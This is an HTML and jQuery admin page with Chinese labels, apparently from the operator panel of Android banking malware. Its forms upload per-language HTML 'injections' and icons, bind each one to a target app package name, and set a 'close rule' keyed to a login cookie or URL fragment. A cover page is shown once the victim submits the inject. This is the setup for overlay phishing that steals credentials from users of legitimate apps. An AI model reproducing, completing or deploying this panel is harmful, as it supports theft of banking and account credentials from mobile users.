<script>
function toggleGroupId()
{
	if($('#groupId').is(":visible"))
		$('#groupId').hide()
	else
		$('#groupId').show()
}

function showHTML()
{
	$('#div_html').show()
	$('#div_url').hide()
}

function showURL()
{
	$('#div_url').show()
	$('#div_html').hide()
}
</script>

<div class="row">
	<div class="col-md-6">

<div class="panel panel-default">
	<div class="panel-heading">
		<h3 class="panel-title">从ZIP压缩包导入注入</h3>
	</div>
	<div class="panel-body">
		<div class="row">
			<div class="col-md-12">
				<form method="post" enctype="multipart/form-data" action="?a=admin&action=smarts&sub_action=import">

					<cite>
					<p>ZIP压缩包必须包含带有html/png文件的文件夹:
						<ul class="blackOL">
							<li>ES (西班牙语)</li>
								<ul>
									<li>spanish.inject.1.html</li>
									<li>spanish.icon.1.png</li>
								</ul>
							<li>DE (德语)</li>
								<ul>
									<li>german.inject.1.html</li>
									<li>german.icon.1.png</li>
								</ul>
							<li>...</li>
						</ul>
					</p>
					</cite>
					<p>ZIP压缩包 <i>(最大大小: %MAX_SIZE%)</i><input type="file" class="form-control" name="zip" /></p>
					<p>
						<label for="chk1">使用文件夹名称作为分组 </label>
						<input id="chk1" type="checkbox" name="use_folders" onclick="toggleGroupId()" checked>
						
			<div class="row" id="groupId" style="display: none">
				<div class="col-md-3">分组名称</div>
				<div class="col-md-0"></div>
				<div class="col-md-3"><input type="text" class="form-control" pattern="[a-zA-Z0-9]{1,16}" maxlength="16" placeholder="DE" name="group" /></div>
				<div class="col-md-6"><i>(仅限字母和数字)</i></div>
			</div>
			
					</p>
					
					<p class="text-center"><input type="submit" class="btn btn-primary" value="导入" /></p>
				</form>
			</div>
		</div>
	</div>
</div>

	</div>
	
	<!-- right pane -->
	<div class="col-md-6">

		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">添加单个注入</h3>
			</div>
			<div class="panel-body">

<form method="post" enctype="multipart/form-data" action="?a=admin&action=smarts&sub_action=create">
	
		<div class="row">
			<div class="col-md-2">注入类型</div>
			<div class="col-md-1"></div>
			<div class="col-md-2"><input id="chk_html" type="radio" name="stype" value="html" onclick="showHTML()" checked /><label for="chk_html">&nbsp;&nbsp;HTML</label></div>
			<div class="col-md-2"><input id="chk_url" type="radio" name="stype" value="url" onclick="showURL()" /><label for="chk_url">&nbsp;&nbsp;URL</label></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">分组名称</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="text" required class="form-control" pattern="[a-zA-Z0-9]{1,16}" maxlength="16" placeholder="DE" name="group" /></div>
			<div class="col-md-6"><i>(仅限字母和数字)</i></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">应用包名</div>
			<div class="col-md-0"></div>
			<div class="col-md-6"><input type="text" required class="form-control" pattern="[a-zA-Z0-9\.]{3,128}" placeholder="com.android.vending" name="package" /></div>
			<div class="col-md-3"></div>
		</div>
		
<span id="div_html">
		<br />
		<div class="row">
			<div class="col-md-3">HTML文件</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="file" name="html" /></div>
		</div>
</span>
		
<span id="div_url" style="display: none">
		<br />
		<div class="row">
			<div class="col-md-3">URL</div>
			<div class="col-md-0"></div>
			<div class="col-md-9"><input type="text" placeholder="https://google.com/" class="form-control" name="url" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">关闭规则</div>
			<div class="col-md-0"></div>
			<div class="col-md-4"><input type="text" class="form-control" placeholder="&loggedIn=1" name="close_rule" /></div>
			<div class="col-md-5"><i>(URL/Cookie的一部分)</i></div>
		</div>
</span>

		<br />
		<div class="row">
			<div class="col-md-3">HTML文件封面</div>
			<div class="col-md-0"></div>
			<div class="col-md-4"><input type="file" name="cap_data" /></div>
			<div class="col-md-5"><i>(注入提交后显示)</i></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">图标文件 (PNG)</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="file" name="icon" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">默认启用</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="checkbox" checked name="is_active" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3"></div>
			<div class="col-md-3"><input type="submit" class="btn btn-primary" value="创建" /></div>
		</div>
		</form>

			</div>
		</div>

	</div>

</div>


<!--
stype=html, sgroup=FIELD, package=NAME, data=HTML, cap_data="", icon=PNG, is_active=1

- ZIP 选择文件
- 分组 [   es ]
- [x] 使用文件夹名称作为分组

[提交]
-->
